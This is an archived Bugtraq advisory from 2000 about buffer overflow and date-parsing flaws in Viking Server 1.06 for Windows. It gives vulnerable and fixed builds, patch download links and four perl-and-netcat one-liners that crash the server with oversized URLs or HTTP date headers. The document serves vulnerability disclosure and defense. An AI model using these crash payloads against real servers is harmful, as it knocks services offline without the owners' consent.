Bugtraq mailing list archives
[NT] Viking security vulnerabilities enable remote code execution (long URL, date parsing)
From: Aviram Jenik <aviram () BEYONDSECURITY COM>
Date: Mon, 28 Aug 2000 20:59:10 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com Viking security vulnerabilities enable remote code execution (long URL, date parsing) ---------------------------------------------------------------------------- ---- SUMMARY <http://www.robtex.com/viking/> Viking Server is a multi-protocol Internet server/proxy for Windows 95/NT that supports a wide range of protocols such as HTTP, FTP, SOCKS, DNS, TELNET, SMTP, POP3, UUCP, FCP, ICP, etc. Unfortunately it does not perform proper buffer bounds checking, enabling attackers to launch a buffer overflow attack and possibly execute arbitrary code. Also, an incorrect parsing of non-date data causes an exception, enabling remote attackers to cause a Denial of Service attack against the product. DETAILS Vulnerable systems: Viking 1.06 build 355 and prior Immune systems: Viking 1.06 build 370 and above Exploit: Any of the following HTTP commands will crash the server: (1) GET [x11765] HTTP/1.1<enter><enter> (Cmd: perl -e "print \"GET @{['x'x11765]} HTTP/1.1\n\n\""|nc 127.1 80) (2) GET / HTTP/1.1<enter> Unless-Modified-Since: [x14765]<enter><enter> (Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80) (3) GET / HTTP/1.1<enter> If-Range: [x14765]<enter><enter> (Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: @{['x'x14765]}\n\n\""|nc 127.1 80) (4) GET / HTTP/1.1<enter> If-Modified-Since: [x14765]<enter><enter> (Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80) Patch: Robotex has responded immediately and released a patch that deals with these issues. You can download the patch at: ftp://ftp.robtex.com/robtex/viking/beta/viking.zip http://www.robtex.com/files/viking/beta/viking.zip ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ==================== -- Aviram Jenik Beyond Security Ltd. http://www.BeyondSecurity.com http://www.SecuriTeam.com
Current thread:
- [NT] Viking security vulnerabilities enable remote code execution (long URL, date parsing) Aviram Jenik (Aug 28)